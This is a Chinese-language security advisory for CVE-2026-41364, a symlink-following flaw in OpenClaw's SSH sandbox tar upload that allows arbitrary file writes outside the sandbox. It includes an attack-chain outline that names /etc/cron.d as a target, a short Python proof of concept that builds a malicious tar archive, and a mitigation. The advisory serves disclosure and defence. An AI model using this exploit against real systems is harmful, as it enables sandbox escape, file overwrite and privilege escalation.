CVE-2026-41364 CVSS 8.1 高危

CVE-2026-41364 OpenClaw符号链接跟随致任意文件写入

披露日期: 2026-04-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41364

漏洞类型

符号链接跟随

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026.3.31之前的版本中存在一个高危安全漏洞。该漏洞源于SSH沙箱tar上传功能未能正确处理符号链接。远程攻击者可利用此漏洞，通过上传包含恶意符号链接的tar压缩包，绕过沙箱限制，从而在远程主机上写入任意文件。这可能导致系统完整性受损，严重威胁服务器安全。

技术细节

该漏洞的核心在于OpenClaw处理用户上传的tar归档文件时的逻辑缺陷。当系统在SSH沙箱环境中解压tar文件时，未对归档内的符号链接进行严格的安全校验。攻击者可以构造一个特制的tar包，其中包含一个指向沙箱外部敏感路径（如/etc/cron.d或系统配置文件）的符号链接，以及一个指向该符号链接名称的实际文件。在解压过程中，程序会跟随符号链接解析路径，导致文件内容被错误地写入到沙箱外的系统关键位置。这种利用方式实现了路径穿越和沙箱逃逸，攻击者无需高权限即可破坏系统完整性或获取更高权限。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标服务器运行的是OpenClaw，且版本低于2026.3.31。

STEP 2

2. 构造恶意载荷

攻击者创建一个特制的tar压缩包，其中包含指向沙箱外部路径的符号链接和对应的恶意数据文件。

STEP 3

3. 上传文件

攻击者利用低权限账户通过SSH接口将恶意的tar文件上传至OpenClaw的沙箱目录。

STEP 4

4. 触发解压

OpenClaw在解压过程中未能阻止符号链接跟随，将文件内容写入到系统预设的敏感路径。

STEP 5

5. 完成攻击

成功覆盖系统文件，可能导致服务拒绝、权限提升或进一步植入后门。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import os
import tarfile

# Create a directory for the exploit files
os.makedirs('exploit', exist_ok=True)

# 1. Create a symlink pointing to a sensitive file on the host (e.g., /tmp/pwned)
symlink_path = 'exploit/link'
host_path = '/tmp/pwned'
os.symlink(host_path, symlink_path)

# 2. Create a file with malicious content
data_path = 'exploit/data.txt'
with open(data_path, 'w') as f:
    f.write('This file was written via symlink following vulnerability.')

# 3. Create a tar archive
with tarfile.open('exploit.tar', 'w') as tar:
    # Add symlink first
    tar.add(symlink_path, arcname='link')
    # Add data file with the same name as the symlink (to overwrite the target)
    # Note: The exploit usually relies on the order or specific unpacking behavior
    tar.add(data_path, arcname='link')

print('Exploit tar file created: exploit.tar')
# Upload this 'exploit.tar' via the OpenClaw SSH interface.

影响范围

OpenClaw < 2026.3.31

防御指南

临时缓解措施

建议暂时禁用SSH tar上传功能，或在解压前使用安全工具扫描tar包内的符号链接，确保所有链接目标均在沙箱允许的范围内。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表